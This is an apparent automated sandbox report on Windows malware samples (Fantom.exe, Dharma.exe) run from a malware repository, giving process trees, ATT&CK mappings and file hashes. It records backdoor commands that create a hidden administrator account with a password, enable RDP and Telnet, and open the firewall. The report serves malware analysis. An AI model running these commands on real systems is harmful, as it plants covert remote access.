3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 PID 3344 wrote to memory of 3868 3344 msedge.exe 86 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5388 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Da2dalus/The-MALWARE-Repo1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfe8646f8,0x7ffdfe864708,0x7ffdfe8647182⤵PID:3512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:22⤵PID:2648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:82⤵PID:3868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:12⤵PID:4540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:12⤵PID:3348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:82⤵PID:3664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5636 /prefetch:82⤵PID:4060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:12⤵PID:452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6152 /prefetch:82⤵PID:680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5924 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2816
-
-
C:\Users\Admin\Downloads\Fantom.exe"C:\Users\Admin\Downloads\Fantom.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804 -
C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"3⤵
- Executes dropped EXE
PID:4124
-
-
-
C:\Users\Admin\Downloads\Fantom.exe"C:\Users\Admin\Downloads\Fantom.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5508
-
-
C:\Users\Admin\Downloads\Fantom.exe"C:\Users\Admin\Downloads\Fantom.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6036
-
-
C:\Users\Admin\Downloads\Fantom.exe"C:\Users\Admin\Downloads\Fantom.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:744
-
-
C:\Users\Admin\Downloads\Fantom.exe"C:\Users\Admin\Downloads\Fantom.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5824
-
-
C:\Users\Admin\Downloads\Fantom.exe"C:\Users\Admin\Downloads\Fantom.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5188
-
-
C:\Users\Admin\Downloads\Fantom.exe"C:\Users\Admin\Downloads\Fantom.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1912 /prefetch:12⤵PID:5696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:12⤵PID:5764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:12⤵PID:1608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1824 /prefetch:12⤵PID:1580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:12⤵PID:3740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1740 /prefetch:82⤵PID:5652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4728 /prefetch:82⤵PID:5420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3324 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5576
-
-
C:\Users\Admin\Downloads\Dharma.exe"C:\Users\Admin\Downloads\Dharma.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5864 -
C:\Users\Admin\Downloads\ac\nc123.exe"C:\Users\Admin\Downloads\ac\nc123.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1388 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵
- System Location Discovery: System Language Discovery
PID:4500
-
-
-
C:\Users\Admin\Downloads\ac\mssql.exe"C:\Users\Admin\Downloads\ac\mssql.exe"3⤵
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2332
-
-
C:\Users\Admin\Downloads\ac\mssql2.exe"C:\Users\Admin\Downloads\ac\mssql2.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:1948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:3180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="4⤵
- System Location Discovery: System Language Discovery
PID:5312 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5732
-
-
C:\Windows\SysWOW64\find.exeFind "="5⤵
- System Location Discovery: System Language Discovery
PID:1500
-
-
-
C:\Windows\SysWOW64\net.exenet user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"4⤵
- System Location Discovery: System Language Discovery
PID:228 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"5⤵
- System Location Discovery: System Language Discovery
PID:1540
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators systembackup /add4⤵
- System Location Discovery: System Language Discovery
PID:1432 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators systembackup /add5⤵
- System Location Discovery: System Language Discovery
PID:900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="4⤵
- System Location Discovery: System Language Discovery
PID:5416 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value5⤵
- System Location Discovery: System Language Discovery
PID:1044
-
-
C:\Windows\SysWOW64\find.exeFind "="5⤵
- System Location Discovery: System Language Discovery
PID:5984
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" systembackup /add4⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:3100 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add5⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:4388
-
-
-
C:\Windows\SysWOW64\net.exenet accounts /forcelogoff:no /maxpwage:unlimited4⤵
- System Location Discovery: System Language Discovery
PID:4840 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited5⤵
- System Location Discovery: System Language Discovery
PID:2224
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f4⤵
- System Location Discovery: System Language Discovery
PID:5940
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f4⤵
- System Location Discovery: System Language Discovery
PID:6004
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f4⤵
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
PID:5552
-
-
C:\Windows\SysWOW64\attrib.exeattrib C:\users\systembackup +r +a +s +h4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5388
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening TCP 3389 "Remote Desktop"4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4548
-
-
C:\Windows\SysWOW64\sc.exesc config tlntsvr start=auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3872
-
-
C:\Windows\SysWOW64\net.exenet start Telnet4⤵
- System Location Discovery: System Language Discovery
PID:5136 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Telnet5⤵
- System Location Discovery: System Language Discovery
PID:2228
-
-
-
-
C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5496
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:12⤵PID:5384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:12⤵PID:680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:12⤵PID:5440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6332 /prefetch:22⤵PID:4396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:12⤵PID:5924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵PID:4172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:12⤵PID:808
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4424
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3136
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4040
-
C:\Users\Admin\Downloads\Fantom.exe"C:\Users\Admin\Downloads\Fantom.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5124
-
C:\Users\Admin\Downloads\Fantom.exe"C:\Users\Admin\Downloads\Fantom.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5624
-
C:\Users\Admin\Downloads\Fantom.exe"C:\Users\Admin\Downloads\Fantom.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5988
-
C:\Users\Admin\Downloads\Fantom.exe"C:\Users\Admin\Downloads\Fantom.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5832
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
3Hidden Files and Directories
2Hidden Users
1Impair Defenses
2Disable or Modify System Firewall
1Safe Mode Boot
1Modify Registry
1Discovery
Browser Information Discovery
1Password Policy Discovery
1Peripheral Device Discovery
1Permission Groups Discovery
1Local Groups
1Query Registry
3System Information Discovery
4System Location Discovery
1System Language Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5080222bf71c914066786bc44f8861e7f
SHA1623abbde058b6e8a9c79ee709af5c7ee2122cb45
SHA25683035d00246fe1f0a05722bdeb55544deb90525e67a567a9e2698e0cc7202cfb
SHA51228c9903265bd51241968d19b796be6b4e5a3471130cdedfeb969ec5af5d3fe9e8f953854f74839b4e9e32ad52196b226ec895c9ce6e4110a1764455ebf5565c3
-
Filesize
1KB
MD5f0c9922709fe59291d6a4f39a362d8e9
SHA1397fa90435d78de192aa9f68022d058474d0019a
SHA2562ce69bfda42c3a73cda71945e1a194d8a7560e19e2fc041902e6939f8575364b
SHA5128445dd13e024d3d0dd34a46ca25a9678610c89089cc711e8e3624a866ab0e370217279c6ea9505f1d530bab35d83492783d19b658c4087a593c2a534054e93f9
-
Filesize
1KB
MD590453ed9b19e13055e5278135e63e73f
SHA13d9ea3c8230231f23c7982fa7a058138b7c38329
SHA2569fe03afb93e3fe6c93a2addacb75db5cc0822b1735188640e8553fc3dcf02572
SHA512616bb2d70c8edff3b86f20971fc948d042ffef44db150d490c81ca750ab4f63e1774121d022982b70f6cf5a6a48dd2cbee67359839d296e8ab6f0345c17c5af2
-
Filesize
1KB
MD5dd44f4f23e3c135e58211c2a3db17d95
SHA135803935b9975e22b4607eca9ffbfa3c47b99677
SHA256c882414419f9ac73499c09635954d34acf345066c228bfd7cd16ea6748f0ba86
SHA5127d8205bd6392a3b75ffbdf17c256e52545f593c1d682cfc4d28c47b91661f9dc87fb12fd4377770ef6e2a8916276ffca74e57a3371db9011ccaaa6956884694b
-
Filesize
1KB
MD5ca70be578a2b44bc99dcfe13e1ac59c8
SHA1655d7b3a3d785a1fe1d0301e726933b615984e66
SHA25649deb8e42be1ecc2660af371f8d317ed22f0b39bb2394115dd9dd698807cb07a
SHA5123115ce678feddd7f5090266d77995369b1f0806731630a482ca1a47376ac75761bf468ff0b6b1de65414c369c4cff606edd071517496d1647835134ec56f96b7
-
Filesize
1KB
MD54edd56e61c29a2aeb6f1e03b3268e48b
SHA1369836119064b1ae6cd39705c850c0a9002153db
SHA2563041d571557333d69e88e45ef419c5bd9981f9fa3f6861ae4a92b75b12ef707d
SHA5121ae56b9c0de8a35cea7ff344a703cc01c58e1b8de13264e5a179712a328756d944fee8df2923b7118036d78f527c95f7fc300fbfbaf7fa7a71dcfa9453d3fabc
-
Filesize
1KB
MD55244f9e1f19e1ff38bd358a979dc1083
SHA179522c35207e4fed26a99a804a0ce3afc2705380
SHA25600e0f62080fd55ee05a4d63f63d4f2f3ec93fd000990b5a8b87a80f1c3278e7d
SHA512548857b04e8520ea873f79d2991da77a5975a1a05c7ec390a5b25b149b2e5f498751f095f6392fa90c22fde4a28a0eb32366973aa8844e2e8093d5e6bd037561
-
Filesize
1KB
MD57ac36a7404a34ae60094a0c11777eeb6
SHA170658d9e09600ac746f9f0addc5b4340724c8cc9
SHA25671bd7a51ec45025ea71599126135c2a9a7c5466282770451b2335733041a41f3
SHA51251732a740dca92147b648dc42215d3b6223b756460efd365b827ce44d3997becab58d9189b3fa0f514e6d8aec8052c8dd0784ae9754bea9ddd7421730f4207e7
-
Filesize
1KB
MD5fd1ba3907a637c25bcd6bd14d6d72f21
SHA158c9e70c1ff48bbd535571d7cf5e5b639173975a
SHA2566aa80f1d8336e8813acf11dd287355914ea89ef7314250a5f5485ae8f7a5e0c0
SHA512d82381ce99724d47e8dd94a0646914d4e0e049393f03ed518d5699436d966b34c7e616cc8bb0de300249a5f926ba58f4938206b5bff73d1f8d15befef9e2d11b
-
Filesize
1KB
MD501d1f87f0709f7b68b08ea74ee65dff8
SHA1dc6e6ed69994008c86ae859c1829e840b0179763
SHA25662c632930f2bff26401cdf8a0987a50de9c7d799f01e9642c264f6b12e629c29
SHA5122ea48fc9c2e7bb60f6b51a844678dbc1d210e6b6c8b87c8b4874b785ae0a367b4b5b8a91ecb83b677102a0f371dfa360552578afdda80ed2b43a3aeeb9080155
-
Filesize
1KB
MD55d03f9b6593598b6d8fe1a039f5c1986
SHA1195d6fd2f3db4376b8d22ae06da632f9051a71fa
SHA256c769814eb26f2e5d3652f87fc9b54cb15db0296bdcf7222c655dd2cd2ecc84e6
SHA512f41dc98c65151c5d117ea94a69f0587d7165f441ee91aa706e1eed9225a08875bbfdab3331e64dbd33cf43e427ef7fa8a490a6601b3b246f1b57133b2420d6fd
-
Filesize
18KB
MD5bb2e318ba4a27997fe0075571766abb7
SHA1818eccd898d70c3d0804e33d928dab68e45a1982
SHA25650cab2560713fb4f2ee971c10a2f2e9059b96b363c74b2d7b096ef90dd6f75cb
SHA512461545d45723486e8f3e3b9a99fb2d4b6aa7633a13f64274cfe9d3e4faaccd9200f19db2e0e7207db881dbd4bcddfbd581032764ad9124ac785c4ddbd0c77d19
-
Filesize
4KB
MD510da04916bdb1dc530f72355bc9ae287
SHA1cbb1a5fae703adf80a3e79808af16d4f6c83b96d
SHA25664d1a4cdd0ad2359838ad35f5d24da1c91a86d6d79da018d02ff1e593ff0a42f
